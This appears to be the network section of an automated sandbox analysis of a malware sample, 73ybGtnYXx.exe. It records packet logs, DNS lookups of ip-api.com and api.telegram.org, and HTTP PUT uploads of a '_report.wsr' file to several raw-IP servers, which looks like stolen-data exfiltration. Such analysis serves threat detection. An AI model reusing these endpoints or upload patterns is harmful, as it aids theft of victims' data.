                                                                Mar 17, 2025 12:28:24.923422098 CET808060235194.164.198.113192.168.2.8
                                                                Mar 17, 2025 12:28:24.923526049 CET602358080192.168.2.8194.164.198.113
                                                                Mar 17, 2025 12:28:24.971577883 CET808060235194.164.198.113192.168.2.8
                                                                Mar 17, 2025 12:28:43.255552053 CET808060235194.164.198.113192.168.2.8
                                                                Mar 17, 2025 12:28:43.257033110 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.261801958 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.261877060 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.262043953 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.266725063 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.615622997 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.620645046 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.620659113 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.620703936 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.620721102 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.620734930 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.620743036 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.620762110 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.620840073 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.620841980 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.620855093 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.620898962 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.620909929 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.620923042 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.620980978 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.621004105 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.621067047 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.621104956 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.621151924 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.625443935 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.625453949 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.625463963 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.625490904 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.625502110 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.625515938 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.625516891 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.625557899 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.625597954 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.671386003 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.671509027 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.723403931 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.723467112 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.771372080 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.771440983 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.823441982 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.823519945 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.871398926 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.871457100 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.919424057 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.919486046 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:43.971396923 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:43.971460104 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.023389101 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.023946047 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.075419903 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.075526953 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.123411894 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.123545885 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.171374083 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.171495914 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.223360062 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.223454952 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.276458979 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.276601076 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.328401089 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.331914902 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.384416103 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.387928009 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.440181971 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.443907022 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.496711016 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.496834993 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.547688961 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.547816992 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.595463037 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.595921993 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.648616076 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.652115107 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.699395895 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.699512959 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.751379967 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.751461983 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.799441099 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.799638033 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.847520113 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.847683907 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.895394087 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.895479918 CET6023680192.168.2.845.82.65.63
                                                                Mar 17, 2025 12:28:44.897167921 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.899826050 CET60237443192.168.2.85.196.181.135
                                                                Mar 17, 2025 12:28:44.899871111 CET443602375.196.181.135192.168.2.8
                                                                Mar 17, 2025 12:28:44.901869059 CET806023645.82.65.63192.168.2.8
                                                                Mar 17, 2025 12:28:44.901984930 CET60237443192.168.2.85.196.181.135
                                                                Mar 17, 2025 12:28:44.911829948 CET60237443192.168.2.85.196.181.135
                                                                Mar 17, 2025 12:28:44.911854982 CET443602375.196.181.135192.168.2.8
                                                                Mar 17, 2025 12:28:45.557964087 CET443602375.196.181.135192.168.2.8
                                                                Mar 17, 2025 12:28:45.558073997 CET60237443192.168.2.85.196.181.135
                                                                Mar 17, 2025 12:28:45.560787916 CET60237443192.168.2.85.196.181.135
                                                                Mar 17, 2025 12:28:45.560796976 CET443602375.196.181.135192.168.2.8
                                                                Mar 17, 2025 12:28:45.561058044 CET443602375.196.181.135192.168.2.8
                                                                Mar 17, 2025 12:28:45.615139961 CET60237443192.168.2.85.196.181.135
                                                                Mar 17, 2025 12:28:45.738549948 CET60237443192.168.2.85.196.181.135
                                                                Mar 17, 2025 12:28:45.738955975 CET443602375.196.181.135192.168.2.8
                                                                Mar 17, 2025 12:28:45.739027023 CET60237443192.168.2.85.196.181.135
                                                                Mar 17, 2025 12:28:45.744093895 CET60237443192.168.2.85.196.181.135
                                                                Mar 17, 2025 12:28:45.744115114 CET443602375.196.181.135192.168.2.8
                                                                Mar 17, 2025 12:28:45.745089054 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:45.750010967 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:45.750102997 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:45.750344992 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:45.754976034 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.099848032 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.105077982 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.105089903 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.105101109 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.105109930 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.105129957 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.105139017 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.105149984 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.105158091 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.105206013 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.105287075 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.105750084 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.105825901 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.105889082 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.105894089 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.105943918 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.110765934 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.110778093 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.110786915 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.110796928 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.110805988 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.110815048 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.110857010 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.110954046 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.151618958 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.152009964 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.199404001 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.199498892 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.212018967 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.212219954 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.216979027 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.216990948 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217030048 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217041016 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217061996 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.217107058 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217117071 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217123032 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217149019 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.217154980 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217192888 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.217220068 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217230082 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217255116 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217415094 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217426062 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217432976 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217479944 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217562914 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217642069 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217691898 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217703104 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217745066 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217809916 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217819929 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217832088 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217875957 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.217956066 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.221785069 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.221831083 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.221889973 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.222007990 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.222073078 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.407793045 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:46.415869951 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.421204090 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.421334982 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.421493053 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.426486969 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.458909035 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:46.771837950 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.836601973 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.836654902 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.836664915 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.836740017 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.836849928 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.836883068 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.836905956 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.836942911 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.836952925 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.836992979 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.837018013 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.837028980 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.837058067 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.837119102 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.837198019 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.837243080 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.842016935 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.842029095 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.842047930 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.842057943 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.842106104 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.842116117 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.842130899 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.842247963 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.887404919 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.887962103 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.910398006 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.910572052 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.915349007 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915358067 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915374994 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915379047 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915484905 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915488958 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915493011 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915498972 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915503025 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915519953 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.915581942 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915585995 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915590048 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915594101 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915608883 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915610075 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:46.915626049 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915705919 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915709972 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915721893 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915834904 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915900946 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915904999 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915910006 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915993929 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.915998936 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.916007996 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.916034937 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.916078091 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.916081905 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.920315981 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.920370102 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.920392036 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.920466900 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.920490026 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:46.920552015 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:47.131007910 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:47.177678108 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:47.534163952 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:47.538012028 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:47.538075924 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:47.543256998 CET806023895.216.147.179192.168.2.8
                                                                Mar 17, 2025 12:28:47.543277025 CET808060239185.217.98.121192.168.2.8
                                                                Mar 17, 2025 12:28:47.543313980 CET6023880192.168.2.895.216.147.179
                                                                Mar 17, 2025 12:28:47.543344021 CET602398080192.168.2.8185.217.98.121
                                                                Mar 17, 2025 12:28:47.546382904 CET60240443192.168.2.8149.154.167.220
                                                                Mar 17, 2025 12:28:47.546416998 CET44360240149.154.167.220192.168.2.8
                                                                Mar 17, 2025 12:28:47.546483040 CET60240443192.168.2.8149.154.167.220
                                                                Mar 17, 2025 12:28:47.546855927 CET60240443192.168.2.8149.154.167.220
                                                                Mar 17, 2025 12:28:47.546870947 CET44360240149.154.167.220192.168.2.8
                                                                Mar 17, 2025 12:28:48.178481102 CET44360240149.154.167.220192.168.2.8
                                                                Mar 17, 2025 12:28:48.178680897 CET60240443192.168.2.8149.154.167.220
                                                                Mar 17, 2025 12:28:48.180778027 CET60240443192.168.2.8149.154.167.220
                                                                Mar 17, 2025 12:28:48.180789948 CET44360240149.154.167.220192.168.2.8
                                                                Mar 17, 2025 12:28:48.181041956 CET44360240149.154.167.220192.168.2.8
                                                                Mar 17, 2025 12:28:48.187757015 CET60240443192.168.2.8149.154.167.220
                                                                Mar 17, 2025 12:28:48.228332996 CET44360240149.154.167.220192.168.2.8
                                                                Mar 17, 2025 12:28:48.548470974 CET44360240149.154.167.220192.168.2.8
                                                                Mar 17, 2025 12:28:48.548559904 CET44360240149.154.167.220192.168.2.8
                                                                Mar 17, 2025 12:28:48.549612045 CET60240443192.168.2.8149.154.167.220
                                                                Mar 17, 2025 12:28:48.566037893 CET60240443192.168.2.8149.154.167.220
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Mar 17, 2025 12:27:14.994957924 CET6342553192.168.2.81.1.1.1
                                                                Mar 17, 2025 12:27:15.006184101 CET53634251.1.1.1192.168.2.8
                                                                Mar 17, 2025 12:27:45.466085911 CET5363157162.159.36.2192.168.2.8
                                                                Mar 17, 2025 12:27:45.970489025 CET6329753192.168.2.81.1.1.1
                                                                Mar 17, 2025 12:27:45.979145050 CET53632971.1.1.1192.168.2.8
                                                                Mar 17, 2025 12:28:47.538836956 CET5384553192.168.2.81.1.1.1
                                                                Mar 17, 2025 12:28:47.545701027 CET53538451.1.1.1192.168.2.8
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Mar 17, 2025 12:27:14.994957924 CET192.168.2.81.1.1.10x975cStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                Mar 17, 2025 12:27:45.970489025 CET192.168.2.81.1.1.10x18dbStandard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                Mar 17, 2025 12:28:47.538836956 CET192.168.2.81.1.1.10x8c72Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Mar 17, 2025 12:27:15.006184101 CET1.1.1.1192.168.2.80x975cNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                Mar 17, 2025 12:27:45.979145050 CET1.1.1.1192.168.2.80x18dbName error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                Mar 17, 2025 12:28:47.545701027 CET1.1.1.1192.168.2.80x8c72No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                • api.telegram.org
                                                                • ip-api.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.849682208.95.112.1804296C:\Users\user\Desktop\73ybGtnYXx.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 17, 2025 12:27:15.017497063 CET85OUTGET /line?fields=query,country HTTP/1.1
                                                                Host: ip-api.com
                                                                Connection: Keep-Alive
                                                                Mar 17, 2025 12:27:15.471684933 CET197INHTTP/1.1 200 OK
                                                                Date: Mon, 17 Mar 2025 11:27:14 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 27
                                                                Access-Control-Allow-Origin: *
                                                                X-Ttl: 60
                                                                X-Rl: 44
                                                                Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a
                                                                Data Ascii: United States8.46.123.189


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.849683206.166.251.480804296C:\Users\user\Desktop\73ybGtnYXx.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 17, 2025 12:27:15.894418955 CET146OUTPUT /2r1j6_user%40358075_report.wsr HTTP/1.1
                                                                Host: 206.166.251.4:8080
                                                                Content-Length: 152401
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.849689167.99.138.24980804296C:\Users\user\Desktop\73ybGtnYXx.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 17, 2025 12:27:37.388029099 CET147OUTPUT /2r1j6_user%40358075_report.wsr HTTP/1.1
                                                                Host: 167.99.138.249:8080
                                                                Content-Length: 152401
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.86023346.4.73.11890004296C:\Users\user\Desktop\73ybGtnYXx.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 17, 2025 12:27:58.780046940 CET144OUTPUT /2r1j6_user%40358075_report.wsr HTTP/1.1
                                                                Host: 46.4.73.118:9000
                                                                Content-Length: 152401
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.860234206.189.109.146804296C:\Users\user\Desktop\73ybGtnYXx.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 17, 2025 12:28:00.498965025 CET143OUTPUT /2r1j6_user%40358075_report.wsr HTTP/1.1
                                                                Host: 206.189.109.146
                                                                Content-Length: 152401
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Mar 17, 2025 12:28:00.849679947 CET12360OUTData Raw: 57 53 52 24 0f a4 28 04 89 b4 cd 36 7f 09 f9 a0 3c a7 02 79 d4 8d a3 80 8a fe a2 9b af 19 60 ef d1 d5 a9 38 d7 35 52 83 bf df f2 72 44 a9 1d aa ec 77 b0 f5 33 1d c3 7c 89 27 9f 0e 31 03 ba 53 84 44 5c 62 4e cf b3 41 eb 56 e8 c3 37 03 7b 7a 34 2c
                                                                Data Ascii: WSR$(6<y`85RrDw3|'1SD\bNAV7{z4,Y^=yjW.W'Jkvw21~i^zGQ0Ge5= [eRSo)iygM7B}X&#/F+p84/X`71k
                                                                Mar 17, 2025 12:28:00.854646921 CET2472OUTData Raw: 05 e1 66 c4 07 13 d9 13 6d 18 73 6f 0b ad 31 1d 09 55 e7 3f dc 5e 7a de 77 26 0b 95 8a 2b 01 99 93 d3 44 3f 15 f9 b7 b5 73 51 a9 86 9a dd 89 2f d9 70 18 2b 67 0f 92 a0 44 48 cd 18 8f 81 2a 6c d6 b8 cc c3 55 48 4a b0 77 8d 61 27 e0 67 a5 26 9e 95
                                                                Data Ascii: fmso1U?^zw&+D?sQ/p+gDH*lUHJwa'g&g5jipSE]4g}_{OwTx6KH(;@g|v\&A]z/<QJW1Gv= $~$O2<\KN86}&ML8iZ&
                                                                Mar 17, 2025 12:28:00.854676962 CET7416OUTData Raw: 9c 41 a9 b1 65 7a dc cc f8 45 98 8c d4 ce e1 f1 95 b1 da 73 a6 e5 0d 9c 9e 39 6a 7a 64 f3 96 ca f4 a1 79 ad f8 df fc 7e b1 84 aa 45 04 e4 95 20 fd 41 e8 0e 22 c2 b2 f0 51 ef f5 ae b5 bd 3b 48 f3 b4 e5 0c 39 9c 36 39 e9 dc fa ba f8 01 5e 63 82 9d
                                                                Data Ascii: AezEs9jzdy~E A"Q;H969^c2Tv{l77uYG4En)ML-}/>R$wpMzA1%)Xh0Q_Ihv1LFv9+:8\!IOj${H
